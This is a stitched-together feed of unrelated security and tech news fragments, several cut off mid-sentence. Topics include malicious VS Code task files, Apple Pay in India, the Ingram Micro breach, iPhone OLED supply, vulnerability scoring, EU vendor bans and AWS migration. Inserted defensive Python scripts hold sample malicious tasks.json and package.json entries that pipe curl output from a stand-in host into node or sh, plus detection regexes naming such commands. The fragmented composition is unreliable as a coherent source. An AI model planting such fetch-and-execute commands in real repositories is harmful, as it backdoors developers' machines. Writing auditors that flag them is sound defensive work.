The new technique revolves around the abuse of Visual Studio Code’s tasks.json files, which are designed to automate development actions such as builds and scripts. In Jamf-observed attacks, these task definitions are modified to include hidden commands that execute automatically once the repository is opened and trusted by the user.
Those commands run shell processes that retrieve obfuscated JavaScript from remote infrastructure and pipe it directly into Node.js for execution. Jamf researchers noted that the payloads are often hosted on legitimate platforms such as Vercel, further reducing the likelihood of early detection or blocking. Once running, the JavaScript establishes communication with a remote command-and-control server and enables remote code execution (RCE).
Importantly, the backdoor does not depend on VS Code remaining open. After initial execution, the malicious code can persist independently, meaning closing the IDE does not stop the activity. This turns what appears to be a one-time development task into a long-lived foothold on the victim’s system.
Social engineering to developer trust abuse
The effectiveness of the campaign hinges on social engineering rather than technical exploitation. Victims are tricked into interacting with unfamiliar repositories as part of legitimate-looking projects. Once the repository is opened, VS Code’s built-in trust prompt becomes the key, and approving it enables the malicious task execution chain without further warnings.
Jamf researchers also observed redundancy built into the attack flow. In some cases, attackers included fallback mechanisms, such as dictionary files containing embedded JavaScript, ensuring code execution even if the primary task-based delivery failed. Additional payloads were seen being fetched minutes after the initial execution, suggesting layered persistence and ongoing control.
The researchers shared indicators of compromise (IoCs) associated with the campaign, including malicious infrastructure and artifacts observed during the investigation, to support detection. Additionally, they recommended caution while interacting with unfamiliar repositories, particularly those obtained through third parties or interview-style engagements. “Before marking a repository as trusted in Visual Studio Code, it’s important to review its contents,” they added in a blog post. “Similarly, ‘npm install’ should only be run on projects that have been vetted, with particular attention paid to package.json files, install scripts, and task configuration files to help avoid unintentionally executing malicious code.”
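The review the researchers recommend can be partly automated. The script below is an added example, not Jamf's code and not a campaign artifact: it audits a cloned repository's .vscode/tasks.json for tasks that auto-run on folder open (VS Code's runOptions.runOn setting) and for commands that fetch remote content and pipe it into an interpreter, and it lists the npm lifecycle scripts that npm install would execute. The sample files, the example.invalid URLs and the regex heuristics are constructed for this demo and are assumptions to tune for your environment.

```python
"""Added example, not Jamf's code or a campaign artifact: a defender-side audit of
a freshly cloned repository's VS Code task configuration and npm lifecycle scripts,
to run before clicking "Trust" in VS Code or running `npm install`.
All sample files and URLs below are constructed for this demo."""
from __future__ import annotations

import json
import re
from pathlib import Path
from typing import Dict, List

# Heuristics (assumptions for this example, tune for your environment):
# an auto-run task has no business fetching remote content and feeding it to an interpreter.
REMOTE_FETCH = re.compile(r"\b(curl|wget|Invoke-WebRequest|iwr)\b", re.I)
PIPE_TO_INTERPRETER = re.compile(r"\|\s*(node|sh|bash|zsh|python3?|powershell|pwsh)\b", re.I)
INLINE_EVAL = re.compile(r"\b(node\s+-e|eval|base64\s+(-d|--decode))\b", re.I)
# npm runs these scripts during `npm install` without asking.
NPM_HOOKS = ("preinstall", "install", "postinstall", "prepare")


def _task_command(task: Dict) -> str:
    """Flatten a task's command and args into one string for pattern matching."""
    parts = [str(task.get("command", ""))] + [str(a) for a in task.get("args", [])]
    return " ".join(parts)


def audit_tasks_json(text: str) -> List[str]:
    """Return findings for a .vscode/tasks.json document.

    VS Code accepts // comments in tasks.json; they are stripped before parsing.
    A task with runOptions.runOn == "folderOpen" starts as soon as the folder is
    opened and trusted, which is the auto-execution the article describes."""
    cleaned = re.sub(r"^\s*//.*$", "", text, flags=re.M)
    doc = json.loads(cleaned)
    findings: List[str] = []
    for task in doc.get("tasks", []):
        label = task.get("label", "<unlabelled>")
        cmd = _task_command(task)
        if task.get("runOptions", {}).get("runOn") == "folderOpen":
            findings.append(f"task {label!r} runs automatically on folder open")
        if REMOTE_FETCH.search(cmd) and PIPE_TO_INTERPRETER.search(cmd):
            findings.append(f"task {label!r} fetches remote content and pipes it into an interpreter: {cmd}")
        elif INLINE_EVAL.search(cmd):
            findings.append(f"task {label!r} evaluates inline or decoded code: {cmd}")
    return findings


def audit_package_json(text: str) -> List[str]:
    """Return findings for npm lifecycle scripts that run during `npm install`."""
    scripts = json.loads(text).get("scripts", {})
    findings: List[str] = []
    for hook in NPM_HOOKS:
        script = scripts.get(hook)
        if script is None:
            continue
        if REMOTE_FETCH.search(script) or PIPE_TO_INTERPRETER.search(script) or INLINE_EVAL.search(script):
            findings.append(f"package.json {hook} script runs a suspicious command: {script}")
        else:
            findings.append(f"package.json defines a {hook} script; review it before installing: {script}")
    return findings


def audit_repo(root: Path) -> List[str]:
    """Audit a checkout on disk and return every finding."""
    findings: List[str] = []
    tasks = root / ".vscode" / "tasks.json"
    if tasks.is_file():
        findings += audit_tasks_json(tasks.read_text())
    pkg = root / "package.json"
    if pkg.is_file():
        findings += audit_package_json(pkg.read_text())
    return findings


# Constructed sample inputs (not real campaign artifacts).
SAMPLE_TASKS_JSON = r"""{
  // a build task that is merely auto-run: worth a look, not necessarily malicious
  "version": "2.0.0",
  "tasks": [
    {
      "label": "build",
      "type": "shell",
      "command": "npm run build",
      "runOptions": { "runOn": "folderOpen" }
    },
    {
      "label": "setup",
      "type": "shell",
      "command": "curl -s https://example.invalid/bootstrap.js | node",
      "runOptions": { "runOn": "folderOpen" }
    }
  ]
}"""

SAMPLE_PACKAGE_JSON = """{
  "name": "interview-task",
  "scripts": { "postinstall": "curl -s https://example.invalid/s.sh | sh", "test": "jest" }
}"""

if __name__ == "__main__":
    for line in audit_tasks_json(SAMPLE_TASKS_JSON) + audit_package_json(SAMPLE_PACKAGE_JSON):
        print("WARN:", line)
```

Run `audit_repo(Path("path/to/clone"))` on a checkout before trusting it; an auto-run task on its own is only a prompt to read the command, while an auto-run task that fetches and pipes remote code is the pattern the article describes and a reason not to trust the folder at all.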
Every managed security provider is chasing the same problem in 2026 — too many alerts, too few analysts, and clients demanding “CISO-level protection” at SMB budgets. The truth? Most MSSPs are running harder, not smarter. And it’s breaking their margins. That’s where the quiet revolution is happening: AI isn’t just writing reports or surfacing risks — it’s rebuilding how security services are
Apple Pay is set to go live in the Indian market by the end of 2026, according to a new report by Business Standard.


The service still requires regulatory approvals before it can go live in the country, but Apple is reportedly working with banks, regulators, and card networks to bring the payment service to India within the year, claims the publication's sources.

Once launched, Apple Pay is also expected to offer its Tap to Pay on iPhone feature, allowing users in India to make contactless payments at point-of-sale terminals via NFC. But before that can happen, Apple will have to negotiate fees with major card issuers for use of the payment gateway.

UPI dominates digital payments in India, but the report's sources say Apple is unlikely to pursue third-party application provider approval for that system in the near term. Last year, Cashfree Payments and Razorpay integrated Apple Pay to support international payments for Indian merchants.

Apple Pay launched more than 10 years ago, and is already available across 89 markets globally.

The timing comes at a good moment for Apple in India. The company recorded its highest quarterly shipments in the country during Q3 2025, reaching 5 million units and securing fourth place in the market for the first time, according to IDC data.
Tags: Apple Pay, India
This article, "Apple Pay Likely to Launch in India This Year" first appeared on MacRumors.com

JHVEPhoto | shutterstock.com
In July 2025, a ransomware attack had devastating consequences for Ingram Micro: the IT distributor's logistics were paralysed for a week, affecting not only its headquarters in the US but also its German site.
It has now emerged that sensitive data was also exfiltrated in the attack. As Ingram Micro confirmed in a mandatory notification to US authorities, more than 42,000 people are affected. According to the filing, the attackers obtained information on current and former employees as well as job applicants.
In addition to basic records such as names and contact details, dates of birth, ID card numbers and social security numbers were also exposed. Documents from recruitment processes and employee evaluations were stolen as well. The IT distributor employs around 23,500 people worldwide.
Shortly after the attack became known, the Safepay ransomware gang claimed at the time to have captured 3.5 terabytes of data from Ingram Micro. The group emerged in September 2024 and is now among the most active cybercrime gangs.
Apple's Chinese supplier BOE is struggling with iPhone OLED production again, causing millions of panel orders to be shifted to Samsung Display, reports The Elec.


Multiple industry sources told the publication that BOE still hasn't resolved manufacturing issues that emerged in November and December of last year. Problems in a specific production process have reportedly forced the company to halt production on some models entirely.

In the second half of 2025, BOE was supplying OLED panels for the iPhone 13, 14, 15, 16, and 17, as well as the more affordable iPhone 16e and its successor, the upcoming 17e. The quality issues are said to be affecting panels for the iPhone 15, 16, and 17 specifically.

This isn't the first time BOE has had a hard time meeting Apple's panel quality requirements, but what's strange in this case is that BOE had been reliably supplying LTPS OLED panels for the iPhone 15 and 16 for some time. The iPhone 17's LTPO panels are more technically demanding, but the older models shouldn't have posed the same challenges.

"BOE had been stably supplying OLED for the iPhone 15 and 16, so the industry finds this puzzling," one source told The Elec.

BOE is now focused on ensuring stable supply for the iPhone 17e, which is expected to launch in the spring. The company holds the largest panel allocation among suppliers for that model.
Meanwhile, Samsung Display has picked up millions of redirected orders over the past two months. BOE shipped around 40 million iPhone OLED panels in 2024, but that figure likely fell short last year due to the reported production setbacks.

The production issues come after a tumultuous year for BOE's relationship with Samsung Display. Samsung had accused BOE of stealing trade secrets and infringing AMOLED patents, leading to an International Trade Commission (ITC) investigation and preliminary import bans against BOE in the U.S.

The ITC initially found trade secret misappropriation and recommended nearly 15 years of import restrictions, but the companies settled in late 2025, and BOE reportedly paid royalties to Samsung to end the dispute.
Tags: BOE, Samsung, The Elec
This article, "Apple Shifts iPhone OLED Orders to Samsung Amid BOE Troubles" first appeared on MacRumors.com

The common vulnerability scoring system (CVSS) has long served as the industry’s default for assessing vulnerability severity. It has become one of the few “sources of truth” for cybersecurity professionals.
And, you know the drill. A new CVE drops; it gets a CVSS score; teams rush to patch the items with the biggest numbers.
It all feels logical, scientific — even objective. But in practice, it often fails us.
In the cases of Equifax, SolarWinds and Log4Shell, a similar pattern has emerged: the actual damage did not stem solely from the technical severity of the flaws, but rather from the manner in which those flaws propagated through interconnected systems. High CVSS scores did not always correlate with high operational impact. Low-scoring assets triggered the cascading failures. Often, a “medium” vulnerability can have the most significant impact due to its location and the systems it interacts with.
CVSS scores have enormous value as a starting point. They do not capture the relational dynamics. They do not demonstrate how one vulnerability’s exploitation may amplify or propagate risk through dependencies, shared credentials or inherited configurations.
We have historically treated vulnerabilities as isolated points on a list, yet the actual risk lies in their connections.
Why the CVSS score isn’t the whole story
The CVSS rating system focuses on the characteristics of a single asset — how easy a flaw is to exploit, whether a patch exists and the potential confidentiality or availability impact. That’s important, and it’s a solid starting point. But it doesn’t account for something crucial: context.
A vulnerability in a tightly isolated sandbox may score a 9.8 but never affect anything else. Meanwhile, a 5.2 in a single sign-on service, the system that every other system trusts, can become a blast radius multiplier. The score alone tells us nothing about how that flaw might ripple across the enterprise.
In the real world, vulnerabilities don’t stay put. They move. They inherit privileges. They hitch rides through pipelines. They land in places no one expected.
Risk isn’t only about severity. It’s about propagation.
A different way to look at vulnerabilities
This is where the unified linkage model (ULM) comes in. Instead of asking, “How bad is this vulnerability on its own?” ULM asks, “What can this vulnerability affect once it starts moving?”
It focuses on three kinds of relationships:
Adjacency: Systems that sit side by side and can influence each other, even without direct data exchange.
Inheritance: Flaws that travel downstream — like a vulnerability hidden inside an open-source library embedded in dozens of applications.
Trust: Systems that depend on each other’s integrity — like identity providers, update services or CI/CD tools.
When you map these relationships, you stop seeing a list of vulnerabilities and start seeing a network of pathways. Suddenly, a seemingly minor flaw can reveal a much larger story.
How vulnerabilities really move
Modern development pipelines make it incredibly easy for vulnerabilities to spread unnoticed. A flawed library pulled into a build is included in a Docker image. That image gets promoted to production. The container gains new permissions. And eventually, an external endpoint exposes it to the internet. By the time someone sees the CVE notification, the vulnerability may already be alive inside mission-critical systems.
The question isn’t just “What’s the score?” — it’s “Where can this go?”
Revisiting Log4Shell through a linkage lens
Log4Shell didn’t become historic because it was technically severe. Hundreds of vulnerabilities are rated critical every year. It became historic because it was everywhere. Log4j was inherited through nested dependencies, embedded in countless libraries and trusted by systems that consumed untrusted data.
It was a perfect storm of inheritance, adjacency and trust.
Log4Shell taught us that a vulnerability’s true danger lies not only in what it is, but in where it lives.
What happens when we score based on linkage?
ULM doesn’t replace CVSS scores. It enhances them. It forces us to think about depth, reach and influence.
A vulnerability in a retired development VM might score 9.8. However, if nothing depends on it, its real-world priority may be low.
Meanwhile, a flaw in a GitHub runner that feeds production builds could score much higher when evaluated through linkage. It sits in a trusted pipeline, inherits credentials and can influence downstream systems. In a ULM view, its urgency skyrockets.
A number alone can mislead. A narrative reveals risk.
How organizations can start using ULM today
This doesn’t require a massive overhaul. It starts with a mindset shift:
Map how systems connect, not just what systems exist. Look for shared components, shared identities, shared pipelines. Ask which systems others trust, depend on or inherit from. Then prioritize vulnerabilities based on where they sit in that network — especially those near identity systems, CI/CD pipelines or widely used shared services. These are the silent amplifiers.
Start small. Focus on the systems with the most downstream influence. The picture will come into focus quickly.
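The three relationships above (adjacency, inheritance, trust), the "retired VM versus CI runner" comparison, and the "map how systems connect" advice can be made concrete in a few dozen lines. What follows is an added example, not the article's own model or any published ULM implementation: it stores the asset map as a directed graph whose edges are labelled with the relationship kind, walks it to find everything a flaw can reach, and scales the CVSS score by the criticality of what lies downstream. The inventory, the criticality values and the per-edge weights are constructed for the demo and are assumptions, chosen so that trust and inheritance carry risk further than adjacency.

```python
"""Added example, not the article's own model: an illustrative linkage score that
combines a CVSS base score with how far a flaw can propagate across a map of
adjacency, inheritance and trust relationships. The inventory, edges and edge
weights are constructed for this demo; the weighting is an assumption, not a
published ULM formula."""
from __future__ import annotations

from collections import deque
from typing import Dict, List, Tuple

# Assumed weights: a trust or inheritance edge carries more of the risk forward
# than mere adjacency. A path's weight is the product of its edge weights.
EDGE_WEIGHT = {"adjacency": 0.5, "inheritance": 0.8, "trust": 1.0}

# Directed edges: source -> [(downstream asset, relationship kind)].
Graph = Dict[str, List[Tuple[str, str]]]


def reachable(graph: Graph, start: str) -> Dict[str, float]:
    """Return every asset the flaw can propagate to, with the strongest path weight.
    Label-correcting search: a node is revisited only when a stronger path is found,
    and because all weights are <= 1 the search terminates on cyclic graphs too."""
    best = {start: 1.0}
    queue = deque([start])
    while queue:
        node = queue.popleft()
        for nbr, kind in graph.get(node, []):
            w = best[node] * EDGE_WEIGHT[kind]
            if w > best.get(nbr, 0.0):
                best[nbr] = w
                queue.append(nbr)
    return best


def linkage_score(graph: Graph, criticality: Dict[str, float], asset: str, cvss: float) -> float:
    """CVSS amplified by the criticality of everything downstream, discounted by path weight.
    An isolated asset keeps its plain CVSS score; a well-connected one is scaled up."""
    reach = reachable(graph, asset)
    amplification = sum(w * criticality.get(n, 0.0) for n, w in reach.items() if n != asset)
    return cvss * (1.0 + amplification)


def prioritize(graph: Graph, criticality: Dict[str, float],
               findings: Dict[str, float]) -> List[Tuple[str, float, float]]:
    """Rank (asset, cvss, linkage) tuples by linkage score, highest first."""
    ranked = [(a, c, linkage_score(graph, criticality, a, c)) for a, c in findings.items()]
    return sorted(ranked, key=lambda r: r[2], reverse=True)


def narrative(graph: Graph, asset: str) -> List[str]:
    """The 'where can this go?' story for one asset, one line per reachable system."""
    reach = reachable(graph, asset)
    return [f"{asset} -> {n} (path weight {w:.2f})" for n, w in sorted(reach.items()) if n != asset]


# Constructed inventory mirroring the article's two cases: a retired VM that
# nothing depends on, and a CI runner that feeds production through trusted paths.
GRAPH: Graph = {
    "ci-runner": [("artifact-registry", "trust"), ("prod-deploy", "trust")],
    "artifact-registry": [("prod-api", "inheritance")],
    "prod-deploy": [("prod-api", "inheritance")],
    "prod-api": [("customer-db", "adjacency")],
    "dev-vm-retired": [],
}
CRITICALITY = {
    "ci-runner": 0.5, "artifact-registry": 0.6, "prod-deploy": 0.8,
    "prod-api": 1.0, "customer-db": 1.0, "dev-vm-retired": 0.1,
}
# Two open findings: a 9.8 on the retired VM and a 6.5 on the runner (constructed values).
FINDINGS = {"dev-vm-retired": 9.8, "ci-runner": 6.5}

if __name__ == "__main__":
    for asset, cvss, score in prioritize(GRAPH, CRITICALITY, FINDINGS):
        print(f"{asset:16} CVSS {cvss:4.1f}  linkage {score:5.1f}")
        for line in narrative(GRAPH, asset):
            print("   ", line)
```

With these inputs the retired VM keeps its 9.8 because nothing is downstream of it, while the 6.5 on the CI runner is multiplied by the registry, the deploy service, the production API and the customer database it can reach, and comes out on top of the list. The point is the ordering and the narrative lines, not the absolute numbers; the weights are the knob an organisation tunes once it has mapped its own trust and inheritance edges.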
The bottom line
Vulnerability management isn’t a numbers game. It’s a relationship game.
CVSS tells us, in theory, how severe a vulnerability is. ULM helps us understand how dangerous it could be in practice. And in a world of accelerating complexity, automation and interconnected systems, that context is no longer optional.
To defend our environments, we have to stop seeing vulnerabilities as dots. We have to start seeing the lines between them.
That’s where the real risk lives.
This article is published as part of the Foundry Expert Contributor Network.
Gartner® doesn’t create new categories lightly. Generally speaking, a new acronym only emerges when the industry's collective "to-do list" has become mathematically impossible to complete. And so it seems that the introduction of the Exposure Assessment Platforms (EAP) category is a formal admission that traditional Vulnerability Management (VM) is no longer a viable way to secure a modern
Security vulnerabilities were uncovered in the popular open-source artificial intelligence (AI) framework Chainlit that could allow attackers to steal sensitive data, which may allow for lateral movement within a susceptible organization. Zafran Security said the high-severity flaws, collectively dubbed ChainLeak, could be abused to leak cloud environment API keys and steal sensitive files, or
Jacek Wojnarowski – shutterstock.com
The EU Commission wants to be able to ban controversial suppliers of network technology in Germany and other EU member states in the future. The proposal is likely to target Chinese technology companies such as Huawei and ZTE in particular. The background is concern about sabotage and espionage by third countries.
With a corresponding legal basis, the EU Commission would, as a last resort, be able to prohibit the use of technology from particularly high-risk foreign companies, according to a legislative proposal. The Commission's draft names neither companies nor countries.
The European Commission's recommendations to EU countries, repeated emphatically for years, not to use Huawei and ZTE technology in their mobile networks for security reasons could thereby become binding. In the authority's view, too few countries so far exclude the two manufacturers from the operation of 5G mobile networks.
In 2023 the EU Commission said that the manufacturers ZTE and Huawei posed significantly higher risks than other 5G suppliers. Spain nevertheless initially concluded a multi-million contract with Huawei last year, which the responsible Vice-President of the EU Commission, Henna Virkkunen, criticised.
Huawei and ZTE widely deployed in German mobile networks
Since the introduction of the fourth mobile generation around 15 years ago, Huawei and ZTE have formed the backbone of the German mobile networks (Telekom, Vodafone and above all O2 Telefónica). The two Chinese equipment vendors offered modern technology at prices that European competitors such as Ericsson or Nokia could hardly match.
In recent years, however, the use of the foreign technology has come under increasing criticism because of suspected security risks and potential influence by China.
During the trade war between the US and China, concern about espionage and sabotage grew. There were fears that content could be intercepted or networks shut down remotely. After years of wrangling, the Federal Ministry of the Interior in Germany reached an agreement with the network operators in summer 2024. Under it, no Huawei or ZTE components may be used in 5G core networks after the end of 2026 at the latest. Chinese technology may still be used on radio masts until the end of 2029.
Bans possible in other areas of critical infrastructure
Specifically, the mechanism now proposed by the EU Commission would allow the Brussels network watchdogs, together with the member states, to initiate a risk assessment for particular manufacturers. If a supplier is judged too risky, the Commission could, as a final step, put it on a corresponding ban list.
Technology from manufacturers on that list could then no longer be installed in the critical infrastructure of EU countries; under the proposal, existing components would have to be replaced within three years.
Components widespread beyond mobile networks
Experts' concerns about the use of technology from China are not limited to mobile networks. In other areas of critical infrastructure too, such as railways, the energy sector or municipal networks, devices from Huawei or ZTE were installed for years.
Huawei, for instance, is the world market leader in inverters for solar installations. These smart devices are connected to the grid. Here some experts fear a specific threat scenario: if a hostile actor could switch off or manipulate thousands of these inverters simultaneously, the stability of the power grid would be at risk.
Here too, under the legislative proposal, the EU Commission could act in the future and examine and exclude manufacturers that it considers to be associated with security risks.
Before the EU Commission's proposals are implemented and the Brussels authority actually gains far more extensive powers than before, the European Parliament and the EU member states still have to deal with the ideas. They can also propose amendments.
EU cybersecurity agency to help with defence
The EU Commission also wants to equip the EU cybersecurity agency ENISA with more powers, and with that give it more tasks as well. The agency, based in Greece, is for example to help fend off so-called ransomware attacks together with national authorities. Ransomware is malware that encrypts data and systems and releases them again only against payment of a ransom.
How serious the consequences of such cyberattacks can be for people in Europe was shown most recently by the numerous outages and delays at several European airports in September of last year. After an IT service provider was hit with malware, airports in Berlin, Brussels, Dublin and London Heathrow experienced days of problems with passenger and baggage handling.
Together with the member states, ENISA is also to identify cybersecurity vulnerabilities and set additional EU-wide standards. For its new responsibilities, the agency is to receive about 100 additional staff and significantly more money under the EU Commission's plans. The European Parliament and the EU member states still have to consider these Commission proposals as well. (dpa/jm)

The recently discovered sophisticated Linux malware framework known as VoidLink is assessed to have been developed by a single person with assistance from an artificial intelligence (AI) model. That's according to new findings from Check Point Research, which identified operational security blunders by the malware's author that provided clues to its developmental origins. The latest insight makes
In the modern business era, the mandate is clear: innovate or become obsolete. For most enterprises, this innovation is fueled by the cloud. However, as organizations transition from legacy on-premise hardware to the elastic, high-performance world of Amazon Web Services (AWS), they face a dual challenge. First, the technical complexity of migrating massive datasets without disrupting operations; and second, the ever-evolving threat landscape that views cloud adoption as a new surface for attack.
To thrive, businesses must view cloud migration and cybersecurity not as separate IT tasks, but as two sides of the same coin. By leveraging expert AWS cloud migration services and rigorous vulnerability management, companies can build a digital foundation that is both agile and impenetrable.
Part I: The Strategic Shift—AWS Cloud Migration
Migration is more than a simple “copy-paste” of data. It is a fundamental shift in how a business consumes technology. AWS offers a vast ecosystem of over 200 services, but unlocking that potential requires a structured approach.
1. The 6 R’s of Migration Strategy
Before a single byte is moved, architects must determine the fate of every application. This is typically categorized by the “6 R’s”:
Rehost (Lift-and-Shift): Moving applications to the cloud without modification. This is the fastest way to exit a physical data center.
Replatform (Lift-and-Reshape): Making minor optimizations to take advantage of cloud features without changing the core code.
Refactor / Re-architect: Reimagining how an application is built using cloud-native features like serverless computing (AWS Lambda).
Repurchase: Moving to a different product, often a SaaS platform.
Retire: Decommissioning applications that are no longer useful.
Retain: Keeping certain applications on-premise due to compliance or latency needs.
2. Overcoming Migration Hurdles with Opsio
Modern migration services, such as those provided by Opsio, focus on reducing the friction of this transition. The primary goal is to maintain Business Continuity.
Using the AWS Application Migration Service (MGN), businesses can automate the conversion of physical, virtual, or cloud-based servers to run natively on AWS. This minimizes manual errors and ensures that the “cutover” period—the moment you switch from the old system to the new—is measured in minutes rather than days.
3. The Economic Impact: From CapEx to OpEx
One of the most compelling reasons for AWS migration is the financial transformation. In a traditional setup, businesses must guess their peak capacity and buy expensive hardware upfront (Capital Expenditure). On AWS, you move to Operational Expenditure, paying only for what you use. Migration services help implement “Right-Sizing,” ensuring you aren’t paying for a 64GB RAM server when your application only uses 8GB.
Part II: Securing the New Frontier—Vulnerability Management
The cloud operates on a Shared Responsibility Model. AWS is responsible for the security of the cloud (the physical data centers, cables, and global infrastructure). However, you are responsible for security in the cloud—your data, your applications, and your user permissions.
As soon as an instance goes live on AWS, it becomes a target. This is where SeqOps’ Vulnerability Management becomes critical.
1. The Vulnerability Lifecycle
Cybersecurity is no longer a “set it and forget it” endeavor. Vulnerability management is a continuous cycle:
Discovery: Identifying every asset in your cloud inventory. You cannot protect what you cannot see.
Assessment: Scanning these assets for known weaknesses (CVEs), misconfigurations, and weak passwords.
Prioritization: Using risk scores to determine which vulnerabilities are “critical” (easily exploitable and high impact) versus “low” (theoretical risks).
Remediation: Patching the software, changing the configuration, or blocking the vulnerable port.
Verification: Running a follow-up scan to ensure the fix worked.
2. Server Security and Patch Management
In a cloud environment, servers are often “ephemeral”—they may exist for only a few hours to handle a spike in traffic. Traditional security tools struggle with this. Modern vulnerability management integrates directly with the cloud’s API to track these temporary servers.
Security services like SeqOps provide deep-visibility into the operating system layer. This ensures that even if a developer forgets to update a library in a custom application, the system flags the risk immediately, preventing a potential data breach.
3. Compliance and Governance
For industries like finance, healthcare, and e-commerce, migration is not just a technical challenge but a legal one. Frameworks like GDPR, HIPAA, and PCI DSS require strict proof that data is being handled securely. Automated vulnerability scanning provides the audit trails necessary to prove compliance to regulators, saving hundreds of hours in manual documentation.
Part III: The Synergy—Why Migration and Security Must Co-Exist
A common mistake companies make is treating security as a post-migration “add-on.” This leads to “security debt,” where the cloud environment is so cluttered with holes that it becomes more expensive to fix than it was to build.
1. Security by Design
By integrating SeqOps during the Opsio migration process, organizations can achieve Security by Design. This means:
Hardened Images: Only using pre-secured, patched versions of operating systems.
Least Privilege Access: Ensuring no user or application has more access than it absolutely needs.
Infrastructure as Code (IaC) Scanning: Checking the scripts that build your cloud for security flaws before they are even deployed.
2. Faster Incident Response
When your migration is well-documented and your vulnerability management is automated, your “Mean Time to Repair” (MTTR) drops significantly. If a new global threat (like the Log4j vulnerability) emerges, a company with an integrated strategy can identify every affected server in its AWS environment within minutes and deploy a patch across the entire fleet simultaneously.
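A minimal scanner for the “Infrastructure as Code (IaC) Scanning” item in the Security by Design list above, as an added example (not SeqOps or Opsio code). It runs three rules over a constructed CloudFormation template before anything is deployed: an administrative port open to the world, an IAM statement allowing every action on every resource, and an S3 bucket without a complete public access block. The rules, the rule names and the template are assumptions for this example; commercial scanners ship hundreds of rules.

```python
# Added example (not SeqOps or Opsio code): pre-deployment checks over a
# constructed CloudFormation template. Rule set and template are assumptions.
import copy
import json

TEMPLATE = json.loads("""
{
  "Resources": {
    "WebSg": {
      "Type": "AWS::EC2::SecurityGroup",
      "Properties": {
        "GroupDescription": "web tier",
        "SecurityGroupIngress": [
          {"IpProtocol": "tcp", "FromPort": 443, "ToPort": 443, "CidrIp": "0.0.0.0/0"},
          {"IpProtocol": "tcp", "FromPort": 22, "ToPort": 22, "CidrIp": "0.0.0.0/0"}
        ]
      }
    },
    "AdminPolicy": {
      "Type": "AWS::IAM::ManagedPolicy",
      "Properties": {
        "PolicyDocument": {
          "Version": "2012-10-17",
          "Statement": [{"Effect": "Allow", "Action": "*", "Resource": "*"}]
        }
      }
    },
    "LogsBucket": {
      "Type": "AWS::S3::Bucket",
      "Properties": {
        "PublicAccessBlockConfiguration": {
          "BlockPublicAcls": true, "BlockPublicPolicy": true,
          "IgnorePublicAcls": true, "RestrictPublicBuckets": true
        }
      }
    },
    "DataBucket": {"Type": "AWS::S3::Bucket", "Properties": {}}
  }
}
""")

ADMIN_PORTS = {22, 3389}
PAB_KEYS = ("BlockPublicAcls", "BlockPublicPolicy", "IgnorePublicAcls", "RestrictPublicBuckets")


def _as_list(v):
    return v if isinstance(v, list) else [v]


def check_security_group(props):
    for rule in props.get("SecurityGroupIngress", []):
        if rule.get("CidrIp") != "0.0.0.0/0" and rule.get("CidrIpv6") != "::/0":
            continue
        if rule.get("IpProtocol") == "-1":      # -1 means all protocols, all ports
            return "admin-port-open-to-world"
        lo, hi = int(rule.get("FromPort", 0)), int(rule.get("ToPort", 65535))
        if any(lo <= p <= hi for p in ADMIN_PORTS):
            return "admin-port-open-to-world"
    return None


def check_iam_policy(props):
    for stmt in _as_list(props.get("PolicyDocument", {}).get("Statement", [])):
        if stmt.get("Effect") != "Allow":
            continue
        if "*" in _as_list(stmt.get("Action", [])) and "*" in _as_list(stmt.get("Resource", [])):
            return "iam-allow-star-on-star"
    return None


def check_s3_bucket(props):
    pab = props.get("PublicAccessBlockConfiguration", {})
    if not all(pab.get(k) is True for k in PAB_KEYS):
        return "s3-public-access-block-incomplete"
    return None


CHECKS = {
    "AWS::EC2::SecurityGroup": check_security_group,
    "AWS::IAM::Policy": check_iam_policy,
    "AWS::IAM::ManagedPolicy": check_iam_policy,
    "AWS::S3::Bucket": check_s3_bucket,
}


def scan(template):
    """Return (logical resource name, rule id) for every failing resource."""
    findings = []
    for name, res in template.get("Resources", {}).items():
        check = CHECKS.get(res.get("Type"))
        if check is None:
            continue
        hit = check(res.get("Properties", {}))
        if hit:
            findings.append((name, hit))
    return findings


def fixed_template():
    """The same template with the three findings corrected, to show a clean scan."""
    t = copy.deepcopy(TEMPLATE)
    t["Resources"]["WebSg"]["Properties"]["SecurityGroupIngress"][1]["CidrIp"] = "10.0.0.0/8"
    t["Resources"]["AdminPolicy"]["Properties"]["PolicyDocument"]["Statement"][0].update(
        {"Action": ["s3:GetObject"], "Resource": ["arn:aws:s3:::example-logs/*"]})
    t["Resources"]["DataBucket"]["Properties"]["PublicAccessBlockConfiguration"] = dict.fromkeys(PAB_KEYS, True)
    return t


if __name__ == "__main__":
    for name, rule in scan(TEMPLATE):
        print(f"FAIL {name}: {rule}")
    print("after fix:", scan(fixed_template()) or "clean")
```

Run this in CI on every template change and fail the pipeline on any finding; the cost of the fix is a one-line edit before deployment rather than an emergency change on a live environment.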
Conclusion: Investing in Resilience
The journey to the cloud is a marathon, not a sprint. Success is defined by how well you can balance the speed of migration with the stability of your security posture.
By partnering with experts like Opsio for the technical migration and SeqOps for ongoing vulnerability management, you create a resilient digital ecosystem. You gain the freedom to innovate on the world’s leading cloud platform, backed by the peace of mind that your data, your customers, and your reputation are shielded from the threats of the digital age.
View the full article
Increased reliance on IT service providers, digital tools, and third-party software is greatly expanding the enterprise attack surface, with noteworthy cyberattacks over the past year underscoring this fact. 
In October 2025, Marks & Spencer terminated its longtime helpdesk deal with outsourcing giant Tata Consultancy Services following a cyberattack that cost the British retailer an estimated £300 million and temporarily shut down its online business.
In August, a Chinese threat group leveraged compromised OAuth tokens from third-party platform Salesloft Drift to exfiltrate sensitive business data — AWS keys, Snowflake tokens, passwords — from as many as 700 organizations. This came on the heels of a wave of attacks in which cybercriminal gang ShinyHunters pretended to be IT support personnel to trick users into connecting to malicious versions of Salesforce’s Data Loader, which was then used to exfiltrate data from Salesforce environments. All told, 1.5 billion Salesforce records were claimed to have been stolen.
And back in April, a critical zero-day vulnerability in SAP NetWeaver led to one of the most widespread incidents involving an ERP platform, illustrating that enterprise software has become a prime target for attackers because compromising it directly impacts an organization’s revenue, operations, and reputation.
“Adversaries continue to exploit the path of least resistance, increasingly targeting third-party providers and human vulnerabilities to bypass technical controls,” says Casey Corcoran, field CISO at Stratascale, the cybersecurity division of SHI International. “By compromising trusted vendors, attackers can move undetected for longer periods, exploiting established access points across multiple organizations.”
Because these are newer avenues for attack, companies have been caught on their heels. “We don’t have enough preparation or defensive tools to rapidly detect and defend against these attacks, leading to a significant level of risk for lots of companies,” says Joshua Wright, faculty fellow of the SANS Institute and technical director at Cyber Hack Challenges.
John Alford, CSO at TeraType, an adviser to pharmaceutical, financial, and SaaS firms on cybersecurity, compliance, audit and AI governance, says legacy mindsets are also to blame.
